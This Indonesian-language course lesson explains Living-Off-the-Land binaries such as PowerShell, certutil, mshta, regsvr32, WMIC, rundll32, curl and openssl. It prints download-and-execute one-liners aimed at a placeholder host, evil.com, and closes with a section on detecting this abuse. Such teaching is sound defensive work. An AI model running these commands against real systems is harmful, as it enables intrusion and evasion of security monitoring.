Biner Living-Off-the-Land (LOLBins)
Gunakan biner Windows tepercaya (certutil, mshta, regsvr32) untuk menghindari deteksi.
Biner Living-Off-the-Land (LOLBins) adalah pelajaran Cyber Security Academy gratis di CoddyKit. Ini adalah pelajaran 2 dari 4. Kamu bisa membaca pelajaran lengkapnya di bawah secara gratis — lalu praktikkan langsung di browser dengan editor kode bawaan dan tutor AI 24/7. Ini adalah bagian dari jalur belajar Cyber Security Academy, dan progresmu tersinkronisasi di web dan aplikasi CoddyKit. Kursus Cyber Security Academy mencakup 4 pelajaran total.
Apa Itu LOLBins?
Living-Off-the-Land Binaries (LOLBins) adalah biner dan alat system yang sah, tetapi digunakan kembali oleh penyerang untuk melakukan tindakan berbahaya. Karena merupakan alat system tepercaya dan bertanda tangan, alat-alat ini sering melewati daftar putih aplikasi serta mengurangi deteksi AV/EDR.
Mengapa LOLBins Efektif
Keuntungan bagi penyerang:
- Selalu tersedia pada sistem target — tidak perlu menambahkan berkas baru
- Ditandatangani oleh Microsoft atau Apple — melewati deteksi berbasis tanda tangan
- Dipercaya oleh solusi daftar putih aplikasi
- Menghasilkan pohon proses yang tampak sah
PowerShell sebagai LOLBin
PowerShell adalah LOLBin yang paling sering disalahgunakan. Penyerang menggunakannya untuk:
# Download and execute from memory:
powershell -enc BASE64_ENCODED_COMMAND
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"certutil
certutil.exe adalah alat sertifikat Windows yang dapat mengunduh berkas:
# Download file to disk:
certutil -urlcache -split -f http://evil.com/payload.exe C:\temp\payload.exe
# Base64 decode:
certutil -decode encoded.b64 decoded.exemshta dan wscript
Eksekusi skrip melalui host tepercaya:
# mshta: execute HTA application from URL
mshta http://evil.com/payload.hta
# wscript: execute VBScript/JScript
wscript //E:VBScript evil.vbs
# cscript: console script host
cscript //nologo payload.jsregsvr32 Squiblydoo
regsvr32.exe dapat memuat dan mengeksekusi DLL dari URL jarak jauh melalui tanda /s /n /u /i — melewati AppLocker dan menjalankan kode tanpa tanda tangan sebagai proses tepercaya:
regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dllWMIC dan Eksekusi WMI
Windows Management Instrumentation mengeksekusi kode dari jarak jauh maupun secara lokal:
# Execute command via WMI:
wmic process call create "powershell.exe -enc PAYLOAD"
# Remote execution:
wmic /node:TARGET process call create "cmd.exe /c payload.exe"Rundll32
rundll32.exe memuat dan mengeksekusi titik masuk DLL:
# Execute a DLL export:
rundll32 evil.dll,EntryPoint
# Run JavaScript via rundll32:
rundll32 javascript:"\..\mshtml,RunHTMLApplication " payloadLOLBins Linux
Padanannya di Linux:
# curl/wget for downloads:
curl http://evil.com/payload | bash
# Python for execution:
python3 -c "import os; os.system('whoami')"
# OpenSSL for file transfer:
openssl s_client -quiet -connect evil.com:443 | bash
# Find LOLBins: gtfobins.github.ioLOLBAS dan GTFOBins
Basis data rujukan:
- LOLBAS (lolbas-project.github.io) — biner, skrip, dan pustaka Windows
- GTFOBins (gtfobins.github.io) — biner Linux/macOS untuk eksploitasi, membaca atau menulis berkas, dan eskalasi SUID
Mendeteksi Penyalahgunaan LOLBin
Strategi deteksi:
- Pencatatan blok skrip PowerShell (EventID 4104) — mencatat perintah yang telah didekodekan
- Sysmon EventID 1: pembuatan proses beserta rantai proses induknya
- Beri peringatan untuk hubungan induk-anak yang tidak terduga: Word → PowerShell, Excel → cmd
- Koneksi jaringan dari certutil, mshta, dan powershell
- Gunakan dasar perilaku UEBA untuk menandai penggunaan biner yang tidak normal
Pemeriksaan Cepat: LOLBins
Biner Windows mana yang dapat mengunduh berkas jarak jauh menggunakan tanda -urlcache?
Ringkasan Pelajaran
LOLBins adalah alat system yang sah dan digunakan kembali untuk tujuan berbahaya: PowerShell, certutil, mshta, regsvr32, rundll32, dan WMIC di Windows; curl, python, dan openssl di Linux. Alat-alat ini melewati deteksi berbasis tanda tangan dan daftar putih aplikasi. Deteksi memerlukan pencatatan pembuatan proses (Sysmon), pencatatan blok skrip PowerShell, serta dasar perilaku. LOLBAS dan GTFOBins adalah basis data rujukan yang penting.
Pertanyaan yang Sering Diajukan
Apakah pelajaran “Biner Living-Off-the-Land (LOLBins)” gratis?
Ya — teks lengkap “Biner Living-Off-the-Land (LOLBins)” gratis dibaca di sini di web. Untuk praktiknya secara interaktif (editor kode bawaan dan tutor AI 24/7) dan buka sisa kursus Cyber Security Academy, upgrade ke CoddyKit PRO. Kursus Cyber Security Academy mencakup 4 pelajaran total.
Apa yang akan aku pelajari di “Biner Living-Off-the-Land (LOLBins)”?
Gunakan biner Windows tepercaya (certutil, mshta, regsvr32) untuk menghindari deteksi. Kamu berlatih Cyber Security Academy dengan kode praktik yang langsung kamu jalankan di browser, dan tutor AI 24/7 menjawab pertanyaanmu saat kamu mengerjakan pelajaran ini.
Apakah aku perlu pengalaman untuk memulai Cyber Security Academy?
Tidak diperlukan pengalaman sebelumnya. Cyber Security Academy di CoddyKit dirancang untuk pemula hingga pelajar tingkat lanjut, jadi kamu bisa memulai di sini atau dari awal dan belajar sesuai kecepatan kamu sendiri. Ini adalah pelajaran 2 dari 4.
Berapa lama pelajaran “Biner Living-Off-the-Land (LOLBins)” memakan waktu?
Sebagian besar pelajaran CoddyKit memakan waktu sekitar 5–10 menit. Setiap pelajaran ringkas dan interaktif, jadi kamu membuat kemajuan stabil dan melanjutkan dari tempat kamu tinggalkan di web dan aplikasi.
Bisakah aku menulis dan menjalankan kode dalam pelajaran Cyber Security Academy ini?
Ya. Setiap pelajaran Cyber Security Academy menyertakan editor kode bawaan, jadi kamu menulis dan menjalankan kode nyata langsung di browser dan mendapatkan umpan balik AI instan — tidak diperlukan penyiapan lokal.
Semua pelajaran dalam kursus ini
- Kerangka Kerja C2: Cobalt Strike dan Sliver
- Biner Living-Off-the-Land (LOLBins)
- Teknik Pergerakan Lateral
- Penulisan Laporan Red Team